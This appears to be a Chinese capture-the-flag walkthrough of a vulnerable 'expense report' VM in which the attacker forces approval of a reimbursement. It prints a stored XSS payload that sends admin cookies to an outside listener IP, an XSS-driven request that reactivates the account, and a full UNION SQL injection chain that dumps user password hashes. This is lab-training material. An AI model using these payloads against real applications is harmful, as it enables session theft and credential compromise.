我要报销靶机

靶机前情提要：

您是“Samuel Lamotte”,而您刚被公司“Furtura Business Informatique"开除。不幸的是，由于您

匆忙离开，您没有时间验证您的上一次商务旅行的费用报告，该报告仍为750欧元，对应于飞往您的最

后一个客户的返程航班。

由于担心您的前雇主可能不想为您退还该费用报告，因此您决定入侵名为公司内部应用程序来通过费

用申请。

您的凭据是：slamotte/fzghn4lw,该应用程序受用户名/密码验证保护，您希望管理员尚未修改或

删除您的访问权限。

=======================================================

允许合作者和经理报告他们的费用，以便尽快报销。

合作者：您的经理，然后财务批准人必须验证您的请求。

经理：财务审批人必须验证您的请求。

要报告费用，您必须先登录。如果您遇到应用程序或请求的任何问题，请使用内部消息系统。

这段话是机翻的，意思含糊不清，大体是说我们要登录上自己的账号提交请求然后还要想办法让经理和财务同意我们的请求

扫描ip

全面扫描

御剑目录扫描

登录试一下

您的帐户已被锁定或处于非活动状态。请联系管理员团队。

这里我们进如目录扫描到的页面可以看到我们的状态是inactive

我们尝试修改状态不行

看来需要管理员修改我们的状态才能登录上去

发现注册页面尝试xss

Kali开启监听端口

<script>document.write('<img src="http://192.168.221.130:8000/?'+document.cookie+'">')</script>

这里发现提交不了

F12找到这个按钮把disable删掉就好了

Kali获得了对方的cookie

在控制台输入cookie尝试用管理员的身份登录

这里说抱歉，作为管理员，您一次只能进行一次身份验证。

既然不能两个地方同时登录我们换一种思路

能不能让管理员帮我们把状态改成active这里不正好有一个可以注入的地方吗

先抓个包看一下改成active状态的数据是什么

<script>document.write('<img src="http://192.168.221.143/admin/admin.php?id=11&status=active

">')</script>

可以看到我们成功改掉了状态

从这里的留言大概知道了我们的财务经理分别是谁

同时也获得一个可以注入xss的地方

得到很多cookie也不知道那个是只能一个一个试

这里找到了我们的申请把它提交

接下来就是让财务同意我们的申请了

这里发现又sql注入点

?id=2 and 1=1

?id=2 and 1=2#确定注入类型

?id=2 order by 1,2 #确定字段

?id=2 and 1=2 union select 1,2#确定回显位置

?id=2 and 1=2 union select database(),2 --+

?id=2 and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+

union select 1,(select group_concat(column_name)from information_schema.columns where table_name='user')--+

?id=2 and 1=2 union select 1,(select group_concat(username,'~',password)from user )--+

根据前面的留言第一个afoulon大概就是财务了

Md5解密

登录财务账号

最后在财务这里通过申请

结束